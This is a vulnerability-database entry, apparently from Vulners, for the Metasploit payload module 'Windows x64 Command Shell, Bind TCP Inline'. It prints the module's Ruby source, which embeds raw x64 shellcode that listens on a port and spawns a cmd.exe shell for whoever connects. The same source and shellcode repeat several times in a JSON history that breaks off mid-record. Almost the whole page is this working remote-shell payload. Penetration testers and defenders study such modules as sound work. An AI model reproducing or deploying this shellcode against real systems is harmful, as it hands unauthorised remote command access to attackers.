Search...

Windows x64 Command Shell, Bind TCP Inline

2009-08-27T19:29:54

ID MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

Listen for a connection and spawn a command shell (Windows x64)

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module MetasploitModule

  CachedSize = 505

  include Msf::Payload::Windows
  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          =&gt; 'Windows x64 Command Shell, Bind TCP Inline',
      'Description'   =&gt; 'Listen for a connection and spawn a command shell (Windows x64)',
      'Author'        =&gt; [ 'sf' ],
      'License'       =&gt; MSF_LICENSE,
      'Platform'      =&gt; 'win',
      'Arch'          =&gt; ARCH_X64,
      'Handler'       =&gt; Msf::Handler::BindTcp,
      'Session'       =&gt; Msf::Sessions::CommandShell,
      'Payload'       =&gt;
        {
          'Offsets' =&gt;
            {
              'LPORT'    =&gt; [ 232, 'n' ],
              'EXITFUNC' =&gt; [ 467, 'V' ],
            },
          'Payload' =&gt;
            "\xFC\x48\x83\xE4\xF0\xE8\xC0\x00\x00\x00\x41\x51\x41\x50\x52\x51" +
            "\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" +
            "\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" +
            "\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" +
            "\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x8B\x80\x88" +
            "\x00\x00\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50\x8B\x48\x18\x44" +
            "\x8B\x40\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41\x8B\x34\x88\x48" +
            "\x01\xD6\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1" +
            "\x38\xE0\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44" +
            "\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49" +
            "\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A" +
            "\x41\x58\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41" +
            "\x59\x5A\x48\x8B\x12\xE9\x57\xFF\xFF\xFF\x5D\x49\xBE\x77\x73\x32" +
            "\x5F\x33\x32\x00\x00\x41\x56\x49\x89\xE6\x48\x81\xEC\xA0\x01\x00" +
            "\x00\x49\x89\xE5\x49\xBC\x02\x00\x11\x5C\x00\x00\x00\x00\x41\x54" +
            "\x49\x89\xE4\x4C\x89\xF1\x41\xBA\x4C\x77\x26\x07\xFF\xD5\x4C\x89" +
            "\xEA\x68\x01\x01\x00\x00\x59\x41\xBA\x29\x80\x6B\x00\xFF\xD5\x50" +
            "\x50\x4D\x31\xC9\x4D\x31\xC0\x48\xFF\xC0\x48\x89\xC2\x48\xFF\xC0" +
            "\x48\x89\xC1\x41\xBA\xEA\x0F\xDF\xE0\xFF\xD5\x48\x89\xC7\x6A\x10" +
            "\x41\x58\x4C\x89\xE2\x48\x89\xF9\x41\xBA\xC2\xDB\x37\x67\xFF\xD5" +
            "\x48\x31\xD2\x48\x89\xF9\x41\xBA\xB7\xE9\x38\xFF\xFF\xD5\x4D\x31" +
            "\xC0\x48\x31\xD2\x48\x89\xF9\x41\xBA\x74\xEC\x3B\xE1\xFF\xD5\x48" +
            "\x89\xF9\x48\x89\xC7\x41\xBA\x75\x6E\x4D\x61\xFF\xD5\x48\x81\xC4" +
            "\xA0\x02\x00\x00\x49\xB8\x63\x6D\x64\x00\x00\x00\x00\x00\x41\x50" +
            "\x41\x50\x48\x89\xE2\x57\x57\x57\x4D\x31\xC0\x6A\x0D\x59\x41\x50" +
            "\xE2\xFC\x66\xC7\x44\x24\x54\x01\x01\x48\x8D\x44\x24\x18\xC6\x00" +
            "\x68\x48\x89\xE6\x56\x50\x41\x50\x41\x50\x41\x50\x49\xFF\xC0\x41" +
            "\x50\x49\xFF\xC8\x4D\x89\xC1\x4C\x89\xC1\x41\xBA\x79\xCC\x3F\x86" +
            "\xFF\xD5\x48\x31\xD2\x48\xFF\xCA\x8B\x0E\x41\xBA\x08\x87\x1D\x60" +
            "\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x41\xBA\xA6\x95\xBD\x9D\xFF\xD5\x48" +
            "\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72" +
            "\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5"
        }
      ))
  end
end

JSON Vulners Source

Initial Source

{"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-06T10:51:43", "history": [{"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/payload/windows/x64/shell_bind_tcp", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-02T23:15:38", "history": [], "viewCount": 5, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": ""}, "lastseen": "2017-07-02T23:15:38", "differentElements": ["href"], "edition": 1}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "ad55ddcf0c6edcb99665964051662ca3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:32:45", "history": [], "viewCount": 18, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6FA476CE00BC8482F43AF2BD9937FB32"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:88D0E22AEC73763DA2CFC04B17A18815", "CARBONBLACK:B027EA436203BDA814C4EA51081F6A87", "CARBONBLACK:89E99C6BF8DD5C2DDE08ED61C12701BF"]}, {"type": "kitploit", "idList": ["KITPLOIT:4252843133018759751", "KITPLOIT:9165290622393060450", "KITPLOIT:5834604300745056017", "KITPLOIT:7455761002232864942"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:8842738F7C86C87FD607E515176F88C8"]}, {"type": "exploitdb", "idList": ["EDB-ID:46335", "EDB-ID:46334", "EDB-ID:46345", "EDB-ID:46343", "EDB-ID:46342", "EDB-ID:46338", "EDB-ID:46346"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891666", "OPENVAS:1361412562310107544", "OPENVAS:1361412562310107540"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1666-1:43CD3"]}], "modified": "2017-08-21T15:32:45"}}, "objectVersion": "1.4", "sourceHref": "", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": ""}, "lastseen": "2017-08-21T15:32:45", "differentElements": ["description", "metasploitReliability", "modified", "published", "sourceData", "sourceHref"], "edition": 2}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-05-28T21:16:18", "history": [], "viewCount": 18, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T21:16:18", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "a0ea5006b4a05e9a83a6a2eef229a354", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-12T01:01:02", "history": [], "viewCount": 18, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-12T01:01:02", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-12T04:38:25", "history": [], "viewCount": 18, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2019-06-12T04:38:25"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:3C0E73E1C38071923188099A40931C49", "THREATPOST:997BDAF6F56D4542DDD5DDA9729D190F", "THREATPOST:040A4A9D0367AA2E807A97FB83D00240", "THREATPOST:32543D9C50E016B8E5F07112935E35F8", "THREATPOST:44B28AC1712980363351C878C13C345F"]}, {"type": "securelist", "idList": ["SECURELIST:DF2707C91EBB08659B3D16664DEEC69A"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1547-1"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:548A2D8484377A20A276BF58474488F7"]}, {"type": "thn", "idList": ["THN:9B966D7333226606F54AD717A81F6D7E", "THN:C9C46E3C63DA812F6C22E297AB5F14C3"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A2A267E7C20665C55127A15BC5B9F7BD"]}, {"type": "exploitdb", "idList": ["EDB-ID:46980"]}, {"type": "symantec", "idList": ["SMNTC-108588", "SMNTC-108641", "SMNTC-108654", "SMNTC-108600", "SMNTC-108644", "SMNTC-108651", "SMNTC-108634", "SMNTC-108599"]}], "modified": "2019-06-12T04:38:25"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-12T04:38:25", "differentElements": ["description", "published", "sourceData", 